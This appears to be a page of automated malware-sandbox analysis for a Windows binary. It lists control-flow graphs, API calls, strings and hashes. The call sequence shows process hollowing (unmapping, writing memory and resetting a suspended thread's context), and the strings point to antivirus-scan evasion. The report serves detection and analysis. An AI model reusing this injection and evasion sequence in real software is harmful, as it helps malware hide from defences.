                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 6027 2ed8d70-2ed8d73 6028 2ed8d78-2ed8d7d 6027->6028 6028->6028 6029 2ed8d7f-2ed8e66 call 2ec4990 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 6028->6029 6060 2ed8e6c-2ed8f47 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 6029->6060 6061 2eda8b7-2eda921 call 2ec4500 * 2 call 2ec4c60 call 2ec4500 call 2ec44dc call 2ec4500 * 2 6029->6061 6060->6061 6105 2ed8f4d-2ed9275 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec30d4 * 2 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4de0 call 2ec4df0 call 2ed8788 6060->6105 6214 2ed92e8-2ed9609 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec2ee0 call 2ec2f08 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 GetThreadContext 6105->6214 6215 2ed9277-2ed92e3 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 6105->6215 6214->6061 6323 2ed960f-2ed9872 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ed8400 6214->6323 6215->6214 6396 2ed9b7f-2ed9bea call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 6323->6396 6397 2ed9878-2ed99e1 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ed8670 6323->6397 6422 2ed9bf0-2ed9d70 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ed7a2c 6396->6422 6423 2ed9beb call 2ed89d0 6396->6423 6487 2ed9a0b-2ed9a76 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 6397->6487 6488 2ed99e3-2ed9a09 call 2ed7a2c 6397->6488 6422->6061 6526 2ed9d76-2ed9e6f call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ed8c80 6422->6526 6423->6422 6496 2ed9a7c-2ed9b73 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ed7a2c 6487->6496 6527 2ed9a77 call 2ed89d0 6487->6527 6488->6496 6567 2ed9b78-2ed9b7d 6496->6567 6579 2ed9e71-2ed9ebe call 2ed8b78 call 2ed8b6c 6526->6579 6580 2ed9ec3-2eda61b call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ed7d78 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ed7d78 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 SetThreadContext NtResumeThread call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec2c2c call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ed894c * 3 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 6526->6580 6527->6496 6567->6422 6579->6580 6805 2eda620-2eda8b2 call 2ed894c * 2 call 2ec4860 call 2ec49a0 call 2ec47ec call 2ec49a0 call 2ed894c call 2ec4860 call 2ec49a0 call 2ec47ec call 2ec49a0 call 2ed894c * 5 call 2ec4860 call 2ec49a0 call 2ec47ec call 2ec49a0 call 2ed894c call 2ec4860 call 2ec49a0 call 2ec47ec call 2ec49a0 call 2ed894c call 2ec4860 call 2ec49a0 call 2ec47ec call 2ec49a0 call 2ed894c call 2ec4860 call 2ec49a0 call 2ec47ec call 2ec49a0 call 2ed894c call 2ed8080 call 2ed894c * 2 6580->6805 6805->6061
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02ED89D0: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,02F4738C,Function_0000662C,00000004,02F4739C,02F4738C,05F5E103,00000040,02F473A0,74F60000,00000000,00000000), ref: 02ED8AAA
                                                                                                                  • Part of subcall function 02ED8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02ED8814
                                                                                                                • GetThreadContext.KERNEL32(00000888,02F47424,ScanString,02F473A8,02EDA93C,UacInitialize,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,UacInitialize,02F473A8), ref: 02ED9602
                                                                                                                  • Part of subcall function 02ED8400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02ED8471
                                                                                                                  • Part of subcall function 02ED8670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02ED86D5
                                                                                                                  • Part of subcall function 02ED7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02ED7A9F
                                                                                                                  • Part of subcall function 02ED7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02ED7DEC
                                                                                                                • SetThreadContext.KERNEL32(00000888,02F47424,ScanBuffer,02F473A8,02EDA93C,ScanString,02F473A8,02EDA93C,Initialize,02F473A8,02EDA93C,0000088C,00360FF8,02F474FC,00000004,02F47500), ref: 02EDA317
                                                                                                                • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000888,00000000,00000888,02F47424,ScanBuffer,02F473A8,02EDA93C,ScanString,02F473A8,02EDA93C,Initialize,02F473A8,02EDA93C,0000088C,00360FF8,02F474FC), ref: 02EDA324
                                                                                                                  • Part of subcall function 02ED894C: LoadLibraryW.KERNEL32(bcrypt,?,00000888,00000000,02F473A8,02EDA587,ScanString,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,Initialize,02F473A8,02EDA93C,UacScan), ref: 02ED8960
                                                                                                                  • Part of subcall function 02ED894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02ED897A
                                                                                                                  • Part of subcall function 02ED894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000888,00000000,02F473A8,02EDA587,ScanString,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,Initialize), ref: 02ED89B6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                • API String ID: 2388221946-51457883
                                                                                                                • Opcode ID: 51c906482db7313c316300a12346157aa4ecdab3930fe060ca49ab93b0471afa
                                                                                                                • Instruction ID: d920d7ae5e2bd51994a036678fbd65929120ccf97fcdc1b0c48b15e42ba82b6d
                                                                                                                • Opcode Fuzzy Hash: 51c906482db7313c316300a12346157aa4ecdab3930fe060ca49ab93b0471afa
                                                                                                                • Instruction Fuzzy Hash: 5AE20035A801589BDB11FBA4ED90BCEB3B6AF84300F60E1B5B0499B354DA70AE57CF51
                                                                                                                Function 02ED8D6E Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 6883 2ed8d6e-2ed8d73 6885 2ed8d78-2ed8d7d 6883->6885 6885->6885 6886 2ed8d7f-2ed8e66 call 2ec4990 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 6885->6886 6917 2ed8e6c-2ed8f47 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 6886->6917 6918 2eda8b7-2eda921 call 2ec4500 * 2 call 2ec4c60 call 2ec4500 call 2ec44dc call 2ec4500 * 2 6886->6918 6917->6918 6962 2ed8f4d-2ed9275 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec30d4 * 2 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4de0 call 2ec4df0 call 2ed8788 6917->6962 7071 2ed92e8-2ed9609 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec2ee0 call 2ec2f08 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 GetThreadContext 6962->7071 7072 2ed9277-2ed92e3 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 6962->7072 7071->6918 7180 2ed960f-2ed9872 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ed8400 7071->7180 7072->7071 7253 2ed9b7f-2ed9bea call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 7180->7253 7254 2ed9878-2ed99e1 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ed8670 7180->7254 7279 2ed9bf0-2ed9d70 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ed7a2c 7253->7279 7280 2ed9beb call 2ed89d0 7253->7280 7344 2ed9a0b-2ed9a76 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 7254->7344 7345 2ed99e3-2ed9a09 call 2ed7a2c 7254->7345 7279->6918 7383 2ed9d76-2ed9e6f call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ed8c80 7279->7383 7280->7279 7353 2ed9a7c-2ed9b7d call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ed7a2c 7344->7353 7384 2ed9a77 call 2ed89d0 7344->7384 7345->7353 7353->7279 7436 2ed9e71-2ed9ebe call 2ed8b78 call 2ed8b6c 7383->7436 7437 2ed9ec3-2eda8b2 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ed7d78 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ed7d78 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 SetThreadContext NtResumeThread call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec2c2c call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ed894c * 3 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ed894c * 2 call 2ec4860 call 2ec49a0 call 2ec47ec call 2ec49a0 call 2ed894c call 2ec4860 call 2ec49a0 call 2ec47ec call 2ec49a0 call 2ed894c * 5 call 2ec4860 call 2ec49a0 call 2ec47ec call 2ec49a0 call 2ed894c call 2ec4860 call 2ec49a0 call 2ec47ec call 2ec49a0 call 2ed894c call 2ec4860 call 2ec49a0 call 2ec47ec call 2ec49a0 call 2ed894c call 2ec4860 call 2ec49a0 call 2ec47ec call 2ec49a0 call 2ed894c call 2ed8080 call 2ed894c * 2 7383->7437 7384->7353 7436->7437 7437->6918
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02ED89D0: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,02F4738C,Function_0000662C,00000004,02F4739C,02F4738C,05F5E103,00000040,02F473A0,74F60000,00000000,00000000), ref: 02ED8AAA
                                                                                                                  • Part of subcall function 02ED8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02ED8814
                                                                                                                • GetThreadContext.KERNEL32(00000888,02F47424,ScanString,02F473A8,02EDA93C,UacInitialize,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,UacInitialize,02F473A8), ref: 02ED9602
                                                                                                                  • Part of subcall function 02ED8400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02ED8471
                                                                                                                  • Part of subcall function 02ED8670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02ED86D5
                                                                                                                  • Part of subcall function 02ED7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02ED7A9F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
                                                                                                                • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                • API String ID: 3386062106-51457883
                                                                                                                • Opcode ID: a289300c3721ef04332c01e25fa601b0a3f324c517055e09fbf7bde0dbcc510a
                                                                                                                • Instruction ID: 2b4b5f18978fd0816e40d2ca5887ff3c68733cd139f07e13370c601800a33b9c
                                                                                                                • Opcode Fuzzy Hash: a289300c3721ef04332c01e25fa601b0a3f324c517055e09fbf7bde0dbcc510a
                                                                                                                • Instruction Fuzzy Hash: 72E20035A801589BDB11FBA4ED90BCEB3B6AF84300F60E1B5B0499B354DA70AE57CF51
                                                                                                                Function 02EC5ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 10945 2ec5acc-2ec5b0d GetModuleFileNameA RegOpenKeyExA 10946 2ec5b4f-2ec5b92 call 2ec5908 RegQueryValueExA 10945->10946 10947 2ec5b0f-2ec5b2b RegOpenKeyExA 10945->10947 10954 2ec5b94-2ec5bb0 RegQueryValueExA 10946->10954 10955 2ec5bb6-2ec5bd0 RegCloseKey 10946->10955 10947->10946 10948 2ec5b2d-2ec5b49 RegOpenKeyExA 10947->10948 10948->10946 10950 2ec5bd8-2ec5c09 lstrcpynA GetThreadLocale GetLocaleInfoA 10948->10950 10952 2ec5c0f-2ec5c13 10950->10952 10953 2ec5cf2-2ec5cf9 10950->10953 10958 2ec5c1f-2ec5c35 lstrlenA 10952->10958 10959 2ec5c15-2ec5c19 10952->10959 10954->10955 10956 2ec5bb2 10954->10956 10956->10955 10960 2ec5c38-2ec5c3b 10958->10960 10959->10953 10959->10958 10961 2ec5c3d-2ec5c45 10960->10961 10962 2ec5c47-2ec5c4f 10960->10962 10961->10962 10963 2ec5c37 10961->10963 10962->10953 10964 2ec5c55-2ec5c5a 10962->10964 10963->10960 10965 2ec5c5c-2ec5c82 lstrcpynA LoadLibraryExA 10964->10965 10966 2ec5c84-2ec5c86 10964->10966 10965->10966 10966->10953 10967 2ec5c88-2ec5c8c 10966->10967 10967->10953 10968 2ec5c8e-2ec5cbe lstrcpynA LoadLibraryExA 10967->10968 10968->10953 10969 2ec5cc0-2ec5cf0 lstrcpynA LoadLibraryExA 10968->10969 10969->10953
                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02EC0000,02EEE790), ref: 02EC5AE8
                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02EC0000,02EEE790), ref: 02EC5B06
                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02EC0000,02EEE790), ref: 02EC5B24
                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02EC5B42
                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02EC5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02EC5B8B
                                                                                                                • RegQueryValueExA.ADVAPI32(?,02EC5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02EC5BD1,?,80000001), ref: 02EC5BA9
                                                                                                                • RegCloseKey.ADVAPI32(?,02EC5BD8,00000000,?,?,00000000,02EC5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02EC5BCB
                                                                                                                • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02EC5BE8
                                                                                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02EC5BF5
                                                                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02EC5BFB
                                                                                                                • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02EC5C26
                                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02EC5C6D
                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02EC5C7D
                                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02EC5CA5
                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02EC5CB5
                                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02EC5CDB
                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02EC5CEB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
